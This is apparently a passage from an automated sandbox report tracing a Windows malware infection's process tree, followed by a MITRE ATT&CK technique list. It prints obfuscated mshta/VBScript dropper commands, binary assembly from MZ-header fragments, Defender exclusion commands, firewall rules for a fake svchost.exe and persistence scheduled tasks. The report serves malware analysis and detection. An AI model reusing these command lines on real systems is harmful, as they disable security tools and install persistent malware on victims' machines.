  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:5264
- - C:\Users\Admin\AppData\Roaming\1955104.exe
    "C:\Users\Admin\AppData\Roaming\1955104.exe"
    3⤵
    PID:5128
- - C:\Users\Admin\AppData\Roaming\1210874.exe
    "C:\Users\Admin\AppData\Roaming\1210874.exe"
    3⤵
    PID:5720
- - C:\Users\Admin\AppData\Roaming\8799358.exe
    "C:\Users\Admin\AppData\Roaming\8799358.exe"
    3⤵
    PID:1528
- - C:\Users\Admin\AppData\Roaming\250902.exe
    "C:\Users\Admin\AppData\Roaming\250902.exe"
    3⤵
    PID:3472
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\250902.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\250902.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\250902.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\250902.exe" ) do taskkill /F /Im "%~Nxk"
        5⤵
        
        PID:2424
      - C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
        
        kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
        6⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
        7⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
        8⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
        7⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
        8⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        9⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
        9⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\control.exe
        
        control .\GKq1GTV.ZnM
        9⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
        10⤵
        
        PID:2664
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /Im "250902.exe"
        6⤵
        Kills process with taskkill
        
        PID:5772
- - C:\Users\Admin\AppData\Roaming\848820.exe
    "C:\Users\Admin\AppData\Roaming\848820.exe"
    3⤵
    PID:4940
- C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe
  "C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe
  "C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2964
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3792
- - C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe
    "C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"
    3⤵
    PID:5424
  - - C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe
      "C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"
      4⤵
      PID:504
  - - C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe
      "C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"
      4⤵
      PID:4080
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 300
        5⤵
        Program crash
        
        PID:4172
  - - C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe
      "C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"
      4⤵
      PID:3036
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        5⤵
        
        PID:3492
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ) do taskkill -f -iM "%~NxM"
        6⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        7⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:456
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "wcnBXcNqNjGhlzUr2QOQS7bQ.exe"
        7⤵
        Kills process with taskkill
        
        PID:104
  - - C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe
      "C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"
      4⤵
      PID:5244
  - - C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe
      "C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"
      4⤵
      PID:5044
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 1728
        5⤵
        Program crash
        
        PID:1560
  - - C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe
      "C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"
      4⤵
      PID:2360
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 300
        5⤵
        Program crash
        
        PID:2156
  - - C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe
      "C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"
      4⤵
      PID:2164
  - - C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe
      "C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"
      4⤵
      Executes dropped EXE
      PID:5116
    - - C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe" -u
        5⤵
        
        PID:2212
  - - C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe
      "C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"
      4⤵
      PID:5184
    - - C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        5⤵
        
        PID:2852
  - - C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe
      "C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"
      4⤵
      PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp" /SL5="$402A8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"
        5⤵
        
        PID:2568
- C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe
  "C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:884
- C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe
  "C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3736
- C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe
  "C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"
  2⤵
  - Executes dropped EXE
  PID:4760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:5688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:4912
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:5348
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Suspicious use of SetThreadContext
    - Creates scheduled task(s)
    PID:3312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:768
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:5900
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:5736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
      4⤵
      PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
      4⤵
      PID:5876
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:2032
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:5944
- C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe
  "C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4532
- C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe
  "C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"
  2⤵
  - Executes dropped EXE
  PID:4196
- C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe
  "C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:5036
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 560
    3⤵
    - Drops file in Windows directory
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5832
- C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe
  "C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"
  2⤵
  - Executes dropped EXE
  PID:3312
- - C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe
    "C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:6048
- C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe
  "C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"
  2⤵
  - Executes dropped EXE
  PID:4076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 204
    3⤵
    - Program crash
    PID:6080
- C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe
  "C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2088
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:1832
- C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe
  "C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe"
  2⤵
  - Executes dropped EXE
  PID:3184
- C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe
  "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"
  2⤵
  - Executes dropped EXE
  PID:2172
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
    3⤵
    PID:4304
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" ) do taskkill -im "%~NxK" -F
      4⤵
      PID:5412
    - - C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        5⤵
        
        PID:5780
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        6⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        7⤵
        
        PID:1940
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
        6⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
        7⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
        8⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        8⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y .\N3V4H8H.SXY
        8⤵
        
        PID:5128
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "D9RJLCLd2f8688ZYCUxUkMQi.exe" -F
        5⤵
        Kills process with taskkill
        
        PID:3716
- C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe
  "C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5364
- - C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
    3⤵
    PID:4516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  2⤵
  PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5036 -ip 5036
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2680 -ip 2680
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4624 -ip 4624
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 768 -ip 768
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4492 -ip 4492
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3184 -ip 3184
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4196 -ip 4196
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1476 -ip 1476
1⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4752 -ip 4752
1⤵
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4076 -ip 4076
1⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4640 -ip 4640
1⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\D85F.exe
C:\Users\Admin\AppData\Local\Temp\D85F.exe
1⤵
PID:3800
- C:\Users\Admin\AppData\Local\Temp\D85F.exe
  C:\Users\Admin\AppData\Local\Temp\D85F.exe
  2⤵
  PID:5392

C:\Users\Admin\AppData\Local\Temp\3064.exe
C:\Users\Admin\AppData\Local\Temp\3064.exe
1⤵
PID:228
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 300
  2⤵
  - Program crash
  PID:4696

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 0bcb9e75efbef4f1243f5b3517ed512a YmKvmH36f0CNISNa9eIUHg.0.1.0.3.0
1⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\43ED.exe
C:\Users\Admin\AppData\Local\Temp\43ED.exe
1⤵
PID:5260
- C:\Users\Admin\AppData\Local\Temp\43ED.exe
  C:\Users\Admin\AppData\Local\Temp\43ED.exe
  2⤵
  PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 228 -ip 228
1⤵
PID:3684

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\5553.dll
1⤵
PID:1372

C:\Users\Admin\AppData\Local\Temp\73D8.exe
C:\Users\Admin\AppData\Local\Temp\73D8.exe
1⤵
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2360 -ip 2360
1⤵
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 4080 -ip 4080
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 5044 -ip 5044
1⤵
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1672 -ip 1672
1⤵
PID:1156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery